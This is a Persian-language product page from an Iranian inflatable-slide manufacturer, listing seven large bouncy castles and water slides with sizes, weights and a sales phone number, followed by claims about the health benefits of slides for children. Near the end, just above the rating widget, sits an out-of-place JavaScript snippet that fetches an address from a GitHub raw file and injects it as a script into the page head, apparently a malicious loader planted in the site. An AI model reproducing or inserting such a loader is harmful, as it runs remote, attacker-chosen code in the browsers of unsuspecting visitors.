7 تا از بزرگترین قصر بادی های بادی سازان مجد

  • سرسره بادی ها بخش کوچک اما پردرآمد یک شهربازی را در بر میگیرند. به علت استهلاک پایین و استفاده بالا و پر فروش برای کودکان و نوجوانان این سرسره بادی ها می تواند سود خوبی را برای شهربازی شما داشته باشد. در این مطلب به 10 تا از بزرگترین قصر بادی های بادی سازان مجد می پردازیم.

    جنس تمامی سرسره بادی های ذکر شده از پارچه با کیفیت کره ای و نخ ترکیه ای می باشد. همچنین چاپ طرح سرسره بادی ها ثابت و رنگبندی بر اساس موجودی انبار می باشد. در برخی موارد شما میتوانید پس از تماس با مشاورین ما (09127484573) در صورت امکان رنگبندی مورد علاقه خود را انتخاب نمایید.

    1. بزرگترین سرسره بادی آبی کشور – سرسره بزرگ KM-167

    بزرگترین قصر بادیKM-167 (S150) برگ زرینی بر افتخارات شرکت تولیدی بادی سازان مجد ( مجد سازه ) با به کار گیری کار گروهی مجرب و استاد کاران نمونه موفق گردید اولین و بزرگترین سرسره بادی آبی در سـطـح کـشـور عـزیزمـان ایـران را تولید و جهت استفاده در سواحل ماسه ای و شهربازی های بزرگ به بهره برداری برساند. این سرسره بزرگ یکی از بهترین سرسره بادی های بادی سازان مجد می باشد. این قصر بادی دارای وزن 1500 کیلوگرم، طول 45 متر و عرض 13.5 متر می باشد. همچنین این قصر بادی بزرگ دارای ارتفاع 13 متر می باشد؛ بنابرین برای استفاده در مکان هایی با ارتفاع پایین مناسب نیست! محل مناسب پیشنهادی این سرسره بادی سواحل ماسه ای و کناره دریها می باشد. جهت خرید این سرسره بادی می توانید با شماره تلفن 09127484573 تماس حاصل نمایید.

    2. سرسره کشتی بزرگ بادی KM-179

    سرسره بادی کشتی بزرگ یکی از پرطرفدار ترین سرسره بادی های بادی سازان مجد می باشد. این سرسره بادی دارای طول ۱۰ متر و عرض ۶.۵ متر می باشد. همچنین ارتفاع این سرسره بادی به ۹ متر می رسد که مناسب محیط های کوچک نیست. بنابرین شما می توانید از این سرسره بادی در شهربازی های سرباز و محیط هایی با ارتفاع نسبتا بالاتر از ۱۰ متر استفاده نمایید. وزن این سرسره بادی چیزی در حدود ۲۵۰ کیلوگرم می باشد.

    این سرسره با تمام ویژگی های برجسته خود به علت نداشتن سکوی کافی برای ایستادن کاربران توسط استاندارد رد شد. به همین علت از خط تولید خارج گردید. اما نگران نباشید، شما می توانید جهت مشاهده دیگر محصولات و محصولات مشابه سرسره بادی بزرگ کشتی به فروشگاه ما سر بزنید. همچنین می توانید جهت مشاوره و خرید با شماره تلفن ۰۹۱۲۷۴۸۴۵۷۳ تماس تلفنی، و یا در شبکه های اجتماعی مانند تلگرام، ایتا، واتساپ، روبیکا و … با همین شماره تلفن تماس حاصل فرمایید. تیم پشتیبانی و فروش ما ۲۴ ساعته جهت خدمات رسانی به مشتریان آماده هستند.

    3. سرسره آبشاری KM-187

    این سرسره بادی ابتکار جدید بادی سازان مجد می باشد که پس از انتشار با اشتیاق کاربران زیادی مواجه شد. این سرسره بادی بسیار زیبا و پرطرفدار دارای ابعاد طولی 15 و عرضی 5 متر می باشد. عرض عقب این سرسره بادی 9 متر و ارتفاع سکوی آن 5.8 متر می باشد. در کل ارتفاع این سرسره مجموعا 11 متر است؛ بنابرین شما نیازمند یک محیط با ارتفاع بیش از 11 متر می باشید. بهتر است این سرسره بادی را در محیط های سر باز تجهیز کنید تا از هزینه های شما بکاهد.

    4. سرسره بادی مرد عنکبوتی KM-166

    این سرسره بادی بسیار کاربر پسند که کودکان را به خود جذب میکند یکی از بهترین سرسره بادی های کشور، کاری از تولیدی بادی سازان مجد می باشد. اگر می خواهید محیطی جذاب برای کودکان فراهم کنید این سرسره بادی نیاز اصلی شماست! سرسره بادی مرد عنکبوتی شامل دو لاین سر و یک لاین راه پله می باشد معمولا در شهر بازی ها وپارک ها که فضای کافی داشته باشند استفاده میکنند.

    وزن این سرسره ۵۶۰ کیلوگرم، طول ۱۲ این سرسره متر و عرض ۸.۵ آن متر می باشد. همچنین ارتفاع این سرسره ۱۲ متر است. محیط مناسب برای این سرسره بیشتر فضاهای باز است ما به علت تنظیم قوانین شهرداری برای ترویج فرهنگ ایرانی ممکن است با طرح این سرسره (مرد عنکبوتی Spider-man) به مشکل برخورد کنید. بنابرین پیشنهاد ما این است که در فضاهای خصوصی تری از آن بهره برداری نمایید.

    5. سرسره پاندا کنگوفو کار KM-154

    قلعه بادی طرح پاندا کنگوفوکار یکی بزرگترین قصر بادی های که جزو محبوب ترین دستگاه های مجدسازه است. این دستگاه فقط در شهر بازی های و پارک های فضای بزرگ دارند قابل استفاده می باشد. ابعاد اندازه طول 9 متر و عرض آن 7 متر و ارتفاع این سرسره بادی به 7 متر می رسد که در فضاهایی باز استفاده می شود. همچنین جهت حمل نقل باید بدانید وزن کلی این سرسره 400 کیلوگرم می باشد. جنس این سرسره از دوخت دقیقی با نخ ترکیه ای است و همچنین پارچه این سرسره پارچه کره ای با کیفیت بالا استفاده می شود. برای اطلاعات بیشتر به این پست مراجعه فرمایید.

    6. سرسره پاندا کنگوفوکار تک سُر KM-144

    قصر بادی پاندا کنگوفوکار یکی بزرگترین قصر بادی های که جزو محبوب ترین دستگاه های مجدسازه است. این دستگاه فقط در شهر بازی های و پارک های فضای بزرگ دارند قابل استفاده می باشد. ابعاد اندازه طول 9 متر و عرض آن 6.5 متر و ارتفاع این سرسره بادی به 7.5 متر می رسد که در فضاهایی باز استفاده می شود. همچنین جهت حمل نقل باید بدانید وزن کلی این سرسره 280 کیلوگرم می باشد. جنس این سرسره از دوخت دقیقی با نخ ترکیه ای است و همچنین پارچه این سرسره پارچه کره ای با کیفیت بالا استفاده می شود. برای اطلاعات بیشتر به این پست مراجعه فرمایید.

    7. سرسره بادی قلعه

    قصر بادی قلعه یکی بزرگترین قصر بادی های که جزو محبوب ترین دستگاه های مجدسازه است. این دستگاه فقط در شهر بازی های و پارک های فضای بزرگ دارند قابل استفاده می باشد. ابعاد اندازه طول 10 متر و عرض آن 6.5 متر و ارتفاع این سرسره بادی به 8.5 متر می رسد که در فضاهایی باز استفاده می شود. همچنین جهت حمل نقل باید بدانید وزن کلی این سرسره 350 کیلوگرم می باشد. جنس این سرسره از دوخت دقیقی با نخ ترکیه ای است و همچنین پارچه این سرسره پارچه کره ای با کیفیت بالا استفاده می شود. برای اطلاعات بیشتر به این پست مراجعه فرمایید.

    درباره سرسره بادی

    یکی فواید قلعه بادی در تفریحات کودکان و بزرگ سالان است. سرسره بازی که مزایای زیادی برای کودکان و بزرگ سالان دارد که ما در اینجا به این فایده می پردازیم

    فواید قلعه بادی ( سرسره ) چیست؟

    سرسره بازی و سرسره بادی بخاطر بالا رفتن از پله ها و سرخوردن طبیعتا بازی فیزیکی محسوب میشه،و همین تحرک برای

    کودکان هم میتونه مفید باشه.یکی دیگه از فواید سرسره بادی این هست که بچه ها با هم بازی میکنن،و یه محیط شاد و

    کودکانه در کنار هم دارن.

    البته این بازی برای عضلات ،گردش خون و تنفس کودکان هم مفید هستش.

    اصلا شاید بزرگترین فایده هم این باشه از فضای مجازی و بازی های کامپیوتری برای دقایقی هم که شده دور باشن

    منافع سرسره کم نیست و به سلامتی کودک کمک بسیار زیادی می‌کند. از دیگر محاسن این بازی می‌توان به عملکرد بهتر شش و‌ قلب اشاره کرد. این وسایل بازی در شهربازی‌های بزرگ و کوچک، پارک‌های مجهز و معمولی وجود دارند. این وسایل بازی در طراحی و رنگ‌های گوناگون تولید شده و از وسایل مهم پارک‌ها و شهربازی‌ها هستند.

    فواید سرسره بازی برای کودکان

    سرسره برای کودکان فواید زیاد دارد از جمله فواید سرسره بازی کودکان می‌توان به این اشاره کرد که سرسره کودکان را تا مدت طولانی سرگرم می‌کند. این وسایل بازی ساده می‌توانند هیجانات کودک را افزایش داده و تجربه عالی در بازی کودک باشند.

    مسلماً همه کودکان به این نوع وسایل بازی علاقه زیادی دارند و دوست دارند ساعت‌ها با آنها بازی کنند. دیگر فواید سرسره بازی کودکان تعادل در حس شنوایی کودکان است. از دیگر فواید می‌توان به افزایش رشد مهارت‌های فیزیکی کودک اشاره کرد.

    کودکان برای بازی با این وسایل بازی نیاز به حرکات مفاصل و عضلات خود دارند. از طرف دیگر سرسره بادی سبب حرکات ظریف دست کودکان می‌شود چرا که کودکان برای بالا رفتن از پله ها از دست و انگشت‌های خود کمک می‌گیرند. از دیگر فواید سرسره می‌توان به پرورش حس عمقی کودکان اشاره کرد.

    نحوه خرید

    تیم پشتیبانی و مشاوره بادی سازان مجد به صورت دوازده ساعته برای مشاوره رایگان و خرید محصولات در خدمت شما عزیزان است. برای تماس و یا خرید این دستگاه ها می توانید به صفحه تماس با ما مراجعه نمایید و یا با شماره تلفن ۰۹۱۲۷۴۸۴۵۷۳ تماس حاصل فرمایید. و یا در شبکه های اجتماعی تلگرام، ایتا، روبیکا و واتساپ با همین شماره تماس بگیرید.

    (var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

    امتیاز شما:

    میانگین امتیازات ۵ از ۵
    از مجموع ۱ رای

    دیدگاهتان را بنویسید